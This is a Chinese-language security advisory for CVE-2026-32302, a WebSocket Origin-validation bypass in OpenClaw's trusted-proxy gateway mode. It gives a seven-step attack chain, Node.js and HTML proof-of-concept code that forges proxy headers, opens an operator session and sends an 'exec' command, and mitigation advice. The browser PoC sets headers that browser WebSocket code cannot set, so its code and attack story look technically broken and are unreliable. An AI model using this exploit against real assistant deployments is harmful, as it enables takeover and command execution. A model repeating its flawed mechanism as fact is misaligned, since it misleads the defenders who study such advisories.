CVE-2026-32302 OpenClaw WebSocket Origin验证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-32302

漏洞类型

身份验证绕过

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw是一款个人AI助手，在2026.3.11之前的版本中存在严重的安全漏洞。当网关认证模式设置为trusted-proxy时，来自浏览器的WebSocket连接可以绕过Origin验证机制。攻击者可以通过构造恶意页面，利用受信任的反向代理服务转发请求，并配合X-Forwarded-For等代理头部信息，欺骗服务器认为请求来自可信来源。这使得攻击者能够从不受信任的网站发起请求，通过中间的反向代理服务转发流量，继承代理认证的用户身份，最终建立具有特权操作员权限的会话。攻击成功后，攻击者可以完全控制AI助手，执行任意命令或访问敏感数据。该漏洞无需任何身份凭证即可发起攻击，但需要诱导用户访问恶意网页并产生交互行为。CVSS评分8.1，属于高危漏洞。

技术细节

该漏洞的根本原因在于OpenClaw的WebSocket连接处理逻辑对Origin头部验证存在缺陷。在gateway.auth.mode设置为trusted-proxy模式下，服务器错误地信任了代理转发的请求中的头部信息，而没有正确验证WebSocket连接的原始Origin。具体来说：1) 攻击者首先在恶意网站部署JavaScript代码，尝试与目标OpenClaw服务器建立WebSocket连接；2) 恶意脚本在请求中注入X-Forwarded-Host、X-Forwarded-Proto等代理头部，伪装成来自受信任反向代理的请求；3) 当请求经过受信任的反向代理转发时，代理会保留或修改这些头部信息；4) OpenClaw服务器根据这些伪造的头部信息验证请求的合法性，由于信任代理而跳过了Origin检查；5) 攻击者通过WebSocket连接建立特权会话，成功继承代理认证的用户身份。修复版本为2026.3.11，修复措施包括增强Origin验证逻辑，移除对trusted-proxy模式下代理头部的过度信任。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意JavaScript代码的网页，该代码尝试与目标OpenClaw服务器建立WebSocket连接

STEP 2

步骤2

诱使目标用户访问该恶意网页，代码自动执行WebSocket连接请求

STEP 3

步骤3

恶意脚本在WebSocket请求中添加X-Forwarded-Host、X-Forwarded-Proto等代理头部，伪装成来自受信任代理的请求

STEP 4

步骤4

请求经过受信任的反向代理转发，代理保留伪造的代理头部信息

STEP 5

步骤5

OpenClaw服务器接收到请求，由于gateway.auth.mode为trusted-proxy，错误地信任代理头部，跳过Origin验证

STEP 6

步骤6

攻击者成功建立WebSocket连接，继承代理认证的用户身份

STEP 7

步骤7

攻击者利用建立的特权会话执行任意命令，窃取敏感数据或完全控制AI助手

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-32302 PoC - OpenClaw WebSocket Origin Bypass
// This PoC demonstrates how an attacker can bypass origin validation
// by using proxy headers when gateway.auth.mode is set to trusted-proxy

const WebSocket = require('ws');

// Target OpenClaw server
const targetHost = 'https://openclaw-victim.example.com';
const gatewayPath = '/gateway';

// Create malicious WebSocket connection with proxy headers
const ws = new WebSocket(`${targetHost}${gatewayPath}`, {
  headers: {
    // Proxy headers that bypass origin validation
    'X-Forwarded-Host': 'trusted-proxy.example.com',
    'X-Forwarded-Proto': 'https',
    'X-Forwarded-For': '10.0.0.1',
    'Host': 'trusted-proxy.example.com',
    'Origin': 'https://trusted-proxy.example.com'
  }
});

ws.on('open', function open() {
  console.log('[+] WebSocket connection established');
  console.log('[+] Proxy headers sent, origin validation bypassed');
  
  // Attempt to establish privileged operator session
  ws.send(JSON.stringify({
    type: 'session',
    action: 'init_operator',
    timestamp: Date.now()
  }));
});

ws.on('message', function(data) {
  const response = JSON.parse(data);
  console.log('[+] Received response:', response);
  
  if (response.privilege === 'operator') {
    console.log('[!] SUCCESS: Privileged operator session established!');
    // Now can execute commands on the AI assistant
    ws.send(JSON.stringify({
      type: 'exec',
      command: 'whoami'
    }));
  }
});

ws.on('error', function(err) {
  console.log('[-] Error:', err.message);
});

// Alternative HTML PoC for browser-based attack
const htmlPoc = `
<!DOCTYPE html>
<html>
<head><title>CVE-2026-32302 PoC</title></head>
<body>
<h1>OpenClaw Origin Bypass PoC</h1>
<button onclick="exploit()">Launch Exploit</button>
<pre id="output"></pre>
<script>
function log(msg) {
  document.getElementById('output').textContent += msg + '\n';
}

function exploit() {
  const ws = new WebSocket('wss://openclaw-victim.example.com/gateway', {
    headers: {
      'X-Forwarded-Host': 'trusted-proxy.example.com',
      'X-Forwarded-Proto': 'https'
    }
  });
  
  ws.onopen = () => {
    log('[+] Connected - Origin bypass attempted');
    ws.send(JSON.stringify({type: 'session', action: 'init_operator'}));
  };
  
  ws.onmessage = (event) => {
    log('[+] Response: ' + event.data);
  };
  
  ws.onerror = (err) => {
    log('[-] Error: ' + err);
  };
}
</script>
</body>
</html>
`;

影响范围

OpenClaw < 2026.3.11

防御指南

临时缓解措施

作为临时缓解措施，可将gateway.auth.mode从trusted-proxy更改为拒绝所有浏览器来源的连接模式，或在反向代理层面过滤X-Forwarded-Host、X-Forwarded-Proto等可被伪造的代理头部。同时限制WebSocket连接的权限级别，默认为低权限模式。但最有效的修复方式是尽快升级到2026.3.11版本。